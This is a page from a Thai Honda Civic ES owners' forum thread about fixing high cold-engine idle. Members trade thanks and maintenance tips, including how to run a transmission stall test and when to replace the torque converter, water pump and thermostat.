ชื่อเล่น: เอเจ

เข้าร่วม: 21 สิงหา 2009
ตอบ: 41

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 37
ให้คำขอบคุณ: 109

ที่อยู่: เพรชเกษม81
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 8 พฤศจิกา 2010 22:08 - thank
ขอบคุณมากๆที่เเชร์ประสบการณ์นะครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
boy_nsm


ชื่อเล่น: บอย

เข้าร่วม: 02 สิงหา 2009
ตอบ: 356

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 522
ให้คำขอบคุณ: 374

ที่อยู่: บ้านบึง - ชลบุรี
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 8 พฤศจิกา 2010 22:20 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
Thank
ได้รับคำขอบคุณจาก: karnmotocross01 
jukkadui


ชื่อเล่น: แบงค์

เข้าร่วม: 05 พฤษภาคม 2010
ตอบ: 1362

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 769
ให้คำขอบคุณ: 1427

ที่อยู่: บางพลี
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 8 พฤศจิกา 2010 22:23 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ได้รับคำขอบคุณจาก: karnmotocross01 
newcolor


เข้าร่วม: 10 กรกฎา 2010
ตอบ: 989

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2374
ให้คำขอบคุณ: 3894
จันทร์, 8 พฤศจิกา 2010 23:11 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ได้รับคำขอบคุณจาก: karnmotocross01 
Fil-reD


ชื่อเล่น: ฟลุ๊ค

เข้าร่วม: 04 ตุลา 2009
ตอบ: 985

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 757
ให้คำขอบคุณ: 597

ที่อยู่: รามอินทรา_ที่ๆมีสุรา
ปี: 2003
อังคาร, 9 พฤศจิกา 2010 00:16 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ได้รับคำขอบคุณจาก: karnmotocross01 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
อังคาร, 9 พฤศจิกา 2010 06:04 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
kamonchai พิมพ์ว่า:
ถามเพิ่มหน่อยครับ เช็ค หะฟสส ะำหะ ที่ว่าเต้าเช็คอย่างไรบ้างครับ
คือผม over hall เกียร์ไปตอน 145000 แต่ ครัชไม่หมด คือมีอาการ
วิ่งลากรอบไป หรือวิ่งความเร็ว 160 ไปนานๆ พอ ผ่อนคั่นเร่ง ก็มี อาการ แหงวๆๆๆๆ
เร่งไม่ขึ้น จะเป็นตอนวิ่งแล้วถอนคันเร่งเร็วๆ พอเป็นต้องหยุดให้สนิท แล้วค่อยไปต่อ
พอไปหาช่างลองตั้งนานกว่าจะเจอ ก็เลย over hall พอถอดมาเช็ค ครัชไม่หมดเหลือเยอะ
ก็เลย คิดว่าเป็นที่ torque converter หรือ ซีลยางแข็งตัว
ช่างก็เลยลองเปลี่ยน ซีล แผ่นครัชใหม่ ก็หายครับ แต่ จะมีอาการคล้ายๆกัน ตอนวิ่งมาเร็วๆ แล้วเบรคลากยาว
ก็จะมีเสียง แหงวๆๆๆ เหมือนเดิม แต่ไม่เป็นไร ซึ่งผมคิดว่ามันไม่ใช่เสียง เหมือนปกติของเกียร์ auto
ทั่วไปครับ ร่ายสะยาว คือ stall test อย่างไรครับ ที่ดูว่า torque converter พัง
ปล.รบกวน PM ร้านที่ทำให้หน่อยได้ไหมครับ ขอบคุณครับ


stall test คือการทดสอบ ประสิทธิภาพของเกียร์แบบง่ายๆครับ ขั้นตอนคือ ยกเบรกมือ เหยียบเบรกที่เท้า เข้าเกียร์ D เร่งเครื่องให้สุด ดูที่วัดรอบ เกียร์ที่ยังมีประสิทธิภาพดีอยู่ควรจะได้รอบประมาณไม่เกิน 2500 บวกลบได้นิดหน่อย

โดยทั่วๆไป รถรุ่นเรามักจะคลัทหมดทำให้การจับไม่ดี รอบก็จะเกินไปถึง 3000 แต่ของผมเพิ่งเปลี่ยนมา ดันได้ 3000 ช่างเลยสงสัยที่ตัว torque converter พอเปลี่ยนก็หายครับ การทดสอบมากกว่านี้ผมก็ไม่ทราบเหมือนกัน

ลองทดสอบดูก่อนครับ การเปลี่ยน ทอร์ค ไม่ต้องถอดเกียร์ ลองหามือสองสภาพดีมาสับดูก็ได้ครับ
ได้รับคำขอบคุณจาก: honeybeex7  karnmotocross01 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
อังคาร, 9 พฤศจิกา 2010 08:56 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
เป็นอะไรที่เรียกว่าเส้นผมบังภูเขาจริง ๆ ครับ
รถผมเปลี่ยนก่อนเลย ทั้งปั๊มน้ำ วาล์วน้ำ เทอโม ถ้ารอให้มีอาการเดี๋ยวจะงานงอก
ได้รับคำขอบคุณจาก: karnmotocross01 
myoatty57


ชื่อเล่น: โอ๊ต

เข้าร่วม: 12 ธันวา 2009
ตอบ: 540

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 442
ให้คำขอบคุณ: 3217

ที่อยู่: ขอนแจ่น
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 9 พฤศจิกา 2010 09:16 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ขอบคุงมากครับ ตอนนี้รถผมก็มีเสียงไรไม่รู้ ถ้าสตา์ร์ทตอนเครื่องเย็น เสียงมันจะดังออกมาจากแถวๆกรองอากาศ ยังไม่ได้ไปให้ช่างดูเลย
ได้รับคำขอบคุณจาก: karnmotocross01 
ตอบ
หน้า 1 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.